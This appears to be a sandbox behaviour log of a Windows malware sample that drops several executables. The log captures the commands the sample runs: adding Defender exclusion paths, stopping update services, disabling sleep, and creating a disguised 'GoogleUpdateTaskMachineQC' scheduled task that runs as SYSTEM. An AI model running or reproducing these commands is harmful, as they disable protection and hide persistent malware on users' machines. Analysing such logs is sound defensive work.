Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-dc 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0
Source: unknown	Process created: C:\Users\user\AppData\Roaming\cdttvvc C:\Users\user\AppData\Roaming\cdttvvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-dc 0
Source: C:\Users\user\AppData\Roaming\cdttvvc	Process created: C:\Users\user\AppData\Roaming\cdttvvc C:\Users\user\AppData\Roaming\cdttvvc
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\System32\conhost.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#mgttsuddg#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\InstallSetup5.exe "C:\Users\user\AppData\Local\Temp\InstallSetup5.exe"	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\toolspub2.exe "C:\Users\user\AppData\Local\Temp\toolspub2.exe"	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exe "C:\Users\user\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exe"	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\latestX.exe "C:\Users\user\AppData\Local\Temp\latestX.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\InstallSetup5.exe	Process created: C:\Users\user\AppData\Local\Temp\Broom.exe C:\Users\user\AppData\Local\Temp\Broom.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Process created: C:\Users\user\AppData\Local\Temp\toolspub2.exe "C:\Users\user\AppData\Local\Temp\toolspub2.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nologo -noprofile	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\latestX.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\latestX.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\latestX.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\latestX.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\latestX.exe	Process created: C:\Windows\System32\schtasks.exe C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Users\user\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exe C:\Users\user\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop UsoSvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop wuauserv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop bits
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop dosvc
Source: C:\Users\user\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nologo -noprofile
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-dc 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-dc 0
Source: C:\Program Files\Google\Chrome\updater.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
Source: C:\Program Files\Google\Chrome\updater.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
Source: C:\Program Files\Google\Chrome\updater.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
Source: C:\Program Files\Google\Chrome\updater.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
Source: C:\Program Files\Google\Chrome\updater.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\System32\conhost.exe
Source: C:\Program Files\Google\Chrome\updater.exe	Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop UsoSvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop wuauserv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop bits
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop dosvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-dc 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-dc 0
Source: C:\Users\user\AppData\Roaming\cdttvvc	Process created: C:\Users\user\AppData\Roaming\cdttvvc C:\Users\user\AppData\Roaming\cdttvvc
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#mgttsuddg#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
Source: C:\Windows\System32\conhost.exe	Process created: unknown unknown

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\InstallSetup5.exe

2_2_00403532

Source: C:\Users\user\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Temp\InstallSetup5.exe

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\InstallSetup5.exe

Code function: 2_2_004021AF CoCreateInstance,

2_2_004021AF

Source: C:\Users\user\AppData\Local\Temp\InstallSetup5.exe

Code function: 2_2_004049C7 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

2_2_004049C7

Source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4584392531.000000000C19C000.00000004.00001000.00020000.00000000.sdmp

Binary or memory string: SELECT OSArchitecture FROM Win32_OperatingSystem.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSCDriverData=C:\Windows\System32\Drivers\DriverData

Source: file.exe	Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\file.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a403a0b75e95c07da2caa7f780446a62\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\b8493bec853ac702d2188091d76ccffa\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a403a0b75e95c07da2caa7f780446a62\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\b8493bec853ac702d2188091d76ccffa\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a403a0b75e95c07da2caa7f780446a62\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\b8493bec853ac702d2188091d76ccffa\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\b8493bec853ac702d2188091d76ccffa\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\b8493bec853ac702d2188091d76ccffa\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\b8493bec853ac702d2188091d76ccffa\mscorlib.ni.dll

Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe

Code function: 3_2_00958404 CreateToolhelp32Snapshot,Module32First,

3_2_00958404

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5720:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1428:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:4928:120:WilError_03
